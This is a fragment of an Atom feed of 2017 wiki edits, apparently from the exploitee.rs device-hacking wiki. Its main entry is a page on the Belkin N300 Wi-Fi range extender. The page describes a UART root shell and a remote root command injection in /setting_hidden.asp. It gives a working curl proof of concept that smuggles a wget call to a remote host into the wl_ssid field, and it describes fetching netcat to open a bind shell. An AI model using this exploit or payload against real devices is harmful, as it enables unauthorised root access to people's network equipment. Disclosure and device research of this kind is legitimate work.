		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=File:DLINK_936L.jpg&amp;diff=2730"/>
		<updated>2017-08-03T23:51:10Z</updated>

		<summary type="html">&lt;p&gt;0x00string: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>0x00string</name></author>
	</entry>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=Belkin_N300&amp;diff=2729</id>
		<title>Belkin N300</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=Belkin_N300&amp;diff=2729"/>
		<updated>2017-08-03T23:47:00Z</updated>

		<summary type="html">&lt;p&gt;0x00string: Created page with &amp;quot;__FORCETOC__ {{Disclaimer}} 320px Category:Belkin N300  =Belkin N300= The Belkin N300 is a Wi-Fi Range Extender which runs a linux kernel on...&amp;quot;&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__FORCETOC__&lt;br /&gt;
{{Disclaimer}}&lt;br /&gt;
[[File:BELKIN_N300.JPG|thumb|320px]]&lt;br /&gt;
[[Category:Belkin N300]]&lt;br /&gt;
&lt;br /&gt;
=Belkin N300=&lt;br /&gt;
The Belkin N300 is a Wi-Fi Range Extender which runs a linux kernel on the RTL8196E chipset.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;quot;With the Belkin Wi-Fi Range Extender, you can expand your home network&#039;s wireless connection up to an additional 5,000 square feet. It&#039;s incredibly simple to install and is compatible with virtually any router, so there&#039;s no need to reconfigure anything on your home wireless network. It&#039;s the fast, easy way to expand your home wireless connection.&amp;quot;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[https://www.amazon.com/Belkin-Wall-Mount-Extender-Simple-F9K1015/dp/B00K6HKJKI/ Amazon]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===UART===&lt;br /&gt;
Hardware root:&lt;br /&gt;
The UART interface, at 38400 buad, will drop to a root shell after the device completes booting.&lt;br /&gt;
&lt;br /&gt;
[[File:BELKIN_N300_UART.JPG|320px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Remote Root==&lt;br /&gt;
&lt;br /&gt;
Remote root:&lt;br /&gt;
The script located at /setting_hidden.asp, which is accessible before and after configuring the device, exhibits multiple remote command injection vulnerabilities. The following parameters in the [form name] form; [list vulnerable parameters], are not properly sanitized after being submitted to the web interface in a POST request. With specially crafted parameters, it is possible to inject a an OS command which will be executed with root privileges, as the web interface, and all processes on the device, run as root.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Caveats:&lt;br /&gt;
The device comes with a limited set of binaries, as well as a notably limited busybox binary. Because of this, the number of commands that can be executed via the command injection is limited. Initially achieving a remote shell is accomplished by executing a wget command to connect to a remote host and download a cross compiled netcat binary, then executed to serve /bin/sh on a given port. Once this is accomplished, a user can connect to the bind shell and have full access to their device.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==POC==&lt;br /&gt;
&lt;br /&gt;
Working as of Firmware 1.00.08&lt;br /&gt;
&lt;br /&gt;
The following curl command is a Proof of Concept which demonstrates injecting an OS command as root.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;curl -i -s -k  -X &#039;POST&#039; -H &#039;Referer: http://192.168.206.1/setting_hidden.asp&#039;\&lt;br /&gt;
 -H &#039;Content-Type: application/x-www-form-urlencoded&#039;\&lt;br /&gt;
 --data-binary $&#039;location_page=setting_hidden.asp&amp;amp;arc_action=vl_wizard_sel_ap&amp;amp;wl_ssid=&amp;quot;&amp;gt;/dev/null;wget 10.0.0.1; echo &amp;quot;AAAA&amp;amp;wl_ssidforfile=BBBB&amp;amp;wl_seckey=CCCC&amp;amp;wl_seckeyforfile=DDDD&amp;amp;action=SetPassWord&amp;amp;formHiddenSSID=formHiddenSSIDpage&amp;amp;submit-url-ok=setting_checkpassword.asp&amp;amp;hidden_sectype=020&amp;amp;wl_rssi=ZXZX&amp;amp;wl_ssid_field=EEEE&amp;amp;key=FFFF&amp;amp;sec=wpa2a&amp;amp;bHiddenAP=1&#039;\&lt;br /&gt;
 &#039;http://192.168.206.1/goform/formBSSetSitesurvey&#039;&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>0x00string</name></author>
	</entry>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=File:BELKIN_N300_UART.JPG&amp;diff=2728</id>
		<title>File:BELKIN N300 UART.JPG</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=File:BELKIN_N300_UART.JPG&amp;diff=2728"/>
		<updated>2017-08-03T23:44:35Z</updated>

		<summary type="html">&lt;p&gt;0x00string: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>0x00string</name></author>
	</entry>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=File:BELKIN_N300.JPG&amp;diff=2727</id>
		<title>File:BELKIN N300.JPG</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=File:BELKIN_N300.JPG&amp;diff=2727"/>
		<updated>2017-08-03T23:43:54Z</updated>

		<summary type="html">&lt;p&gt;0x00string: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>0x00string</name></author>
	</entry>
</feed>